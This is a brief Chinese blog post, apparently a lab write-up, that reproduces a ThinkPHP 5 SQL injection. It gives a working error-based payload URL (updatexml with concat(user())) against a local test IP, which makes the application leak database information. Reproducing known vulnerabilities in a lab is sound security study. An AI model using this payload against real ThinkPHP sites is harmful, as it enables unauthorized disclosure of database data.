thinkphp5sql注入漏洞复现
1.访问url
2.访问漏洞url
3.访问http://192.168.232.128/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
4.数据库信息泄露
作者:
Shu-How Z
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文连接,否则保留追究法律责任的权利。
3.访问http://192.168.232.128/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
浙公网安备 33010602011771号